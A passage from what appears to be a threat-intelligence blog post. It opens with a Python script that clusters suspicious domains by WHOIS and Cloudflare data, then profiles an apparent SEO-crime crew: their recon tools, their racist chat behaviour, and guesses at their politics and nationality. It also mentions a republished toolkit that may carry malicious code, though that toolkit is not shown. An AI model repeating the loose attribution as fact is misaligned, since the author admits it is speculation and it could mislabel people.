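        ra, rb = registry_id(records[a]["whois"]), registry_id(records[b]["whois"])
        if not (ta and tb and ra and rb) or ra[1] != rb[1]:
            continue  # unknown dates/ids, or different registries (.top vs CNIC-run .cfd)
        delta = abs((ta - tb).total_seconds())
        if delta <= window_s:
            hits.append((a, b, int(delta), abs(ra[0] - rb[0])))
    return hits


def pivot(records):
    """Registrar clusters plus every domain whose A records all sit in Cloudflare space."""
    by_registrar = {}
    for domain, rec in records.items():
        by_registrar.setdefault(rec["whois"].get("Registrar IANA ID", "?"), []).append(domain)
    fronted = [d for d, r in sorted(records.items()) if r["a"] and all(is_cloudflare(ip) for ip in r["a"])]
    return {"by_registrar": {k: sorted(v) for k, v in by_registrar.items()}, "cloudflare_fronted": fronted}
```

Run it as a module and call pivot(parse_records(SAMPLE)) and find_batches(parse_records(SAMPLE)); feeding it the full dump above works the same way. The registry-label check in find_batches matters: registry IDs from different registries (the .top IDs versus the CNIC ID on search-1337.cfd) are unrelated counters, so an ID gap only means something inside one registry.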
I don’t think any of what this crew does is technically illegal, at least what they publish outright. There could be things they do in private obviously with these scripts, but anything that I’m looking at directly does not indicate direct illegality. As a result, I have no reason to publish anything about their identities directly, so I have obfuscated everything on that front.
However, the code is very informative on how some adversaries operate. Even if most of the techniques themselves are not difficult, seeing the specific tools used (ffuf, httprobe, nuclei, assetfinder) and the code they developed is informative. They are definitely not unskilled and have demonstrated their own skill in their chats.
Initially they seem to have started out as an AdventureQuest World private server. I’m not sure if they were purchased by an SEO monetization system or if it’s the original team that has just repositioned themselves.
Their politics appear to be that of a pro-Russia stance and perhaps(?) some racism. I make this conclusion from two of their core members having mutual Discord servers with myself, where they stopped posting information about the Ukrainian war immediately after the invasion began. Also, they have posted many pro-Russian statements.
They have also posted this flag with an anime character affixed:
So they could be Slovenian. That makes things hard given they speak no Russian or Slovenian in this server, just English and Portuguese. This makes me believe that they are just masking their origin even further. This is Astolfo, a character from TYPE-MOON, so it could be unrelated entirely:
https://typemoon.fandom.com/wiki/Astolfo
I have seen this character used in anti-trans extremist communities, so that could be part of it as well. I know very little, if anything, about TYPE-MOON, but Astolfo, while looking very, very feminine, seems to be listed as male, so could represent the trans community to some extremists. This also could mean they are ANTI-Slovenian, who knows.
They also cannot stop using the N-word. That is even quoted above. This is interspersed with fake arguments about BLM, which are really just there to agitate for no real reason other than to anger the users in the server. I’m not really sure what their goal is there, perhaps to get someone to report them so they can move to a new server and know who is a “glowie” so they can move on.
They also created, REALLY early on during the leaking of LLaMA, their own “BasedGPT” Discord bot that was spewing nothing but racism, conspiracy theories, and fairly accurate depictions of high-level security topics.
Racism is used in hacking circles mostly to weed out people or to specifically block certain things from being analyzed. It can also be used to confuse, distract, or intimidate.
Back to the crew: I’ve stated this before and I’ll state it again, as someone who is naturally paranoid, I do not understand why people seek out paranoid states. It’s not healthy, and I wish I had a choice like they do, yet they squander their lives deep in it. I’ve heard various accounts of people leaving this life of SEO crime and their lives getting better from a mental health perspective as well as financially. Some people have to learn the hard way, but to each their own.
There were also a lot of hacking tools available on their GitHub page, which they slowly removed. I am publishing their entire toolkit here, which used to exist under https://github.com/chakal1337.
Please be aware that this could contain malicious code, including embedded JavaScript in the HTML, or code that could be used for malicious or tracking purposes. All code is to be used for research purposes only, and be careful when analyzing. Much of the really interesting stuff can be found in old commits that were torched, with later commits replacing it with JS analytics to monitor you if you open the HTML, so be careful and open it in a non-network-connected VM. You have been warned.